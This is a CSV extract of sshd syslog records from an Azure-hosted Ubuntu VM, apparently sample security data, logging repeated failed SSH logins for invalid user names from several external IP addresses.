+15646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:13,UbuntuDevEnv,2019-06-26 06:30:12,auth,UbuntuDevEnv,info,Invalid user english from 139.99.98.248 port 56358,30349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,139.99.98.2,56358,,
+15647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:15,UbuntuDevEnv,2019-06-26 06:30:15,auth,UbuntuDevEnv,info,Failed password for invalid user english from 139.99.98.248 port 56358 ssh2,30349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,139.99.98.2,56358,,
+15648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:15,UbuntuDevEnv,2019-06-26 06:30:15,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 56358:11: Bye Bye [preauth],30349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,56358,,
+15649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:15,UbuntuDevEnv,2019-06-26 06:30:15,auth,UbuntuDevEnv,info,Disconnected from invalid user english 139.99.98.248 port 56358 [preauth],30349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,english,139.99.98.2,56358,,
+15650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:28,UbuntuDevEnv,2019-06-26 06:30:27,auth,UbuntuDevEnv,info,Invalid user student3 from 45.59.69.138 port 55168,30410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student3,45.59.69.1,55168,,
+15651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:28,UbuntuDevEnv,2019-06-26 06:30:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,30410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:28,UbuntuDevEnv,2019-06-26 06:30:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:30,UbuntuDevEnv,2019-06-26 06:30:29,auth,UbuntuDevEnv,info,Failed password for invalid user student3 from 45.59.69.138 port 55168 ssh2,30410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student3,45.59.69.1,55168,,
+15654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:30,UbuntuDevEnv,2019-06-26 06:30:29,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 55168:11: Bye Bye [preauth],30410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,55168,,
+15655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:30:30,UbuntuDevEnv,2019-06-26 06:30:29,auth,UbuntuDevEnv,info,Disconnected from invalid user student3 45.59.69.138 port 55168 [preauth],30410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student3,45.59.69.1,55168,,
+15656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:31:56,UbuntuDevEnv,2019-06-26 06:31:56,auth,UbuntuDevEnv,info,Invalid user testmail from 139.99.98.248 port 45274,30774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,139.99.98.2,45274,,
+15657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:31:56,UbuntuDevEnv,2019-06-26 06:31:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,30774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:31:56,UbuntuDevEnv,2019-06-26 06:31:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:31:59,UbuntuDevEnv,2019-06-26 06:31:58,auth,UbuntuDevEnv,info,Failed password for invalid user testmail from 139.99.98.248 port 45274 ssh2,30774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,139.99.98.2,45274,,
+15660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:31:59,UbuntuDevEnv,2019-06-26 06:31:59,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 45274:11: Bye Bye [preauth],30774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,45274,,
+15661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:31:59,UbuntuDevEnv,2019-06-26 06:31:59,auth,UbuntuDevEnv,info,Disconnected from invalid user testmail 139.99.98.248 port 45274 [preauth],30774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,139.99.98.2,45274,,
+15662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:32:01,UbuntuDevEnv,2019-06-26 06:32:01,auth,UbuntuDevEnv,info,Invalid user saurabh from 45.59.69.138 port 44502,30801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,saurabh,45.59.69.1,44502,,
+15663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:32:01,UbuntuDevEnv,2019-06-26 06:32:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:32:01,UbuntuDevEnv,2019-06-26 06:32:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,30801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:32:03,UbuntuDevEnv,2019-06-26 06:32:03,auth,UbuntuDevEnv,info,Failed password for invalid user saurabh from 45.59.69.138 port 44502 ssh2,30801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,saurabh,45.59.69.1,44502,,
+15666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:32:03,UbuntuDevEnv,2019-06-26 06:32:03,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 44502:11: Bye Bye [preauth],30801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,44502,,
+15667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:32:03,UbuntuDevEnv,2019-06-26 06:32:03,auth,UbuntuDevEnv,info,Disconnected from invalid user saurabh 45.59.69.138 port 44502 [preauth],30801,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,saurabh,45.59.69.1,44502,,
+15668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:32:16,UbuntuDevEnv,2019-06-26 06:32:16,auth,UbuntuDevEnv,info,Connection closed by 218.92.0.161 port 64692 [preauth],30787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,218.92.0.1,64692,,
+15669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:01,UbuntuDevEnv,2019-06-26 06:44:00,auth,UbuntuDevEnv,info,Invalid user porteus from 139.99.98.248 port 52364,33368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,139.99.98.2,52364,,
+15670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:01,UbuntuDevEnv,2019-06-26 06:44:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,33368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:01,UbuntuDevEnv,2019-06-26 06:44:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:03,UbuntuDevEnv,2019-06-26 06:44:02,auth,UbuntuDevEnv,info,Failed password for invalid user porteus from 139.99.98.248 port 52364 ssh2,33368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,139.99.98.2,52364,,
+15673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:03,UbuntuDevEnv,2019-06-26 06:44:03,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 52364:11: Bye Bye [preauth],33368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,52364,,
+15674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:03,UbuntuDevEnv,2019-06-26 06:44:03,auth,UbuntuDevEnv,info,Disconnected from invalid user porteus 139.99.98.248 port 52364 [preauth],33368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,porteus,139.99.98.2,52364,,
+15675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:10,UbuntuDevEnv,2019-06-26 06:44:09,auth,UbuntuDevEnv,info,Invalid user sainte from 45.55.190.46 port 54988,33316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sainte,45.55.190.4,54988,,
+15676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:10,UbuntuDevEnv,2019-06-26 06:44:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:10,UbuntuDevEnv,2019-06-26 06:44:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,33316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+15678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:11,UbuntuDevEnv,2019-06-26 06:44:11,auth,UbuntuDevEnv,info,Failed password for invalid user sainte from 45.55.190.46 port 54988 ssh2,33316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sainte,45.55.190.4,54988,,
+15679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:12,UbuntuDevEnv,2019-06-26 06:44:11,auth,UbuntuDevEnv,info,Disconnected from invalid user sainte 45.55.190.46 port 54988 [preauth],33316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sainte,45.55.190.4,54988,,
+15680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:12,UbuntuDevEnv,2019-06-26 06:44:11,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 54988:11: Bye Bye [preauth],33316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,54988,,
+15681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:12,UbuntuDevEnv,2019-06-26 06:44:12,auth,UbuntuDevEnv,info,Invalid user gpadmin from 46.101.149.230 port 36484,33408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,46.101.149.2,36484,,
+15682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:12,UbuntuDevEnv,2019-06-26 06:44:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:12,UbuntuDevEnv,2019-06-26 06:44:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,33408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+15684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:14,UbuntuDevEnv,2019-06-26 06:44:14,auth,UbuntuDevEnv,info,Failed password for invalid user gpadmin from 46.101.149.230 port 36484 ssh2,33408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,46.101.149.2,36484,,
+15685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:14,UbuntuDevEnv,2019-06-26 06:44:14,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 36484:11: Bye Bye [preauth],33408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,36484,,
+15686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:14,UbuntuDevEnv,2019-06-26 06:44:14,auth,UbuntuDevEnv,info,Disconnected from invalid user gpadmin 46.101.149.230 port 36484 [preauth],33408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,46.101.149.2,36484,,
+15687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:22,UbuntuDevEnv,2019-06-26 06:44:21,auth,UbuntuDevEnv,info,Invalid user ubuntu from 45.59.69.138 port 43904,33452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,45.59.69.1,43904,,
+15688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:22,UbuntuDevEnv,2019-06-26 06:44:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,33452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:22,UbuntuDevEnv,2019-06-26 06:44:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:24,UbuntuDevEnv,2019-06-26 06:44:23,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 45.59.69.138 port 43904 ssh2,33452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,45.59.69.1,43904,,
+15691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:24,UbuntuDevEnv,2019-06-26 06:44:23,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 43904:11: Bye Bye [preauth],33452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,43904,,
+15692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:24,UbuntuDevEnv,2019-06-26 06:44:23,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 45.59.69.138 port 43904 [preauth],33452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,45.59.69.1,43904,,
+15693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:37,UbuntuDevEnv,2019-06-26 06:44:37,auth,UbuntuDevEnv,info,Invalid user qg from 138.68.29.52 port 36832,33504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qg,138.68.29.5,36832,,
+15694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:37,UbuntuDevEnv,2019-06-26 06:44:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:37,UbuntuDevEnv,2019-06-26 06:44:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,33504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+15696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:39,UbuntuDevEnv,2019-06-26 06:44:39,auth,UbuntuDevEnv,info,Failed password for invalid user qg from 138.68.29.52 port 36832 ssh2,33504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qg,138.68.29.5,36832,,
+15697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:39,UbuntuDevEnv,2019-06-26 06:44:39,auth,UbuntuDevEnv,info,Disconnected from invalid user qg 138.68.29.52 port 36832 [preauth],33504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qg,138.68.29.5,36832,,
+15698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:39,UbuntuDevEnv,2019-06-26 06:44:39,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 36832:11: Bye Bye [preauth],33504,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,36832,,
+15699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:52,UbuntuDevEnv,2019-06-26 06:44:51,auth,UbuntuDevEnv,info,Invalid user token from 87.101.240.10 port 36892,33550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,token,87.101.240.1,36892,,
+15700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:52,UbuntuDevEnv,2019-06-26 06:44:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,33550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+15701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:52,UbuntuDevEnv,2019-06-26 06:44:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:54,UbuntuDevEnv,2019-06-26 06:44:53,auth,UbuntuDevEnv,info,Failed password for invalid user token from 87.101.240.10 port 36892 ssh2,33550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,token,87.101.240.1,36892,,
+15703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:54,UbuntuDevEnv,2019-06-26 06:44:53,auth,UbuntuDevEnv,info,Disconnected from invalid user token 87.101.240.10 port 36892 [preauth],33550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,token,87.101.240.1,36892,,
+15704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:44:54,UbuntuDevEnv,2019-06-26 06:44:53,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 36892:11: Bye Bye [preauth],33550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,36892,,
+15705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:11,UbuntuDevEnv,2019-06-26 06:45:11,auth,UbuntuDevEnv,info,Invalid user mosquitto from 64.202.187.152 port 41838,33659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mosquitto,64.202.187.1,41838,,
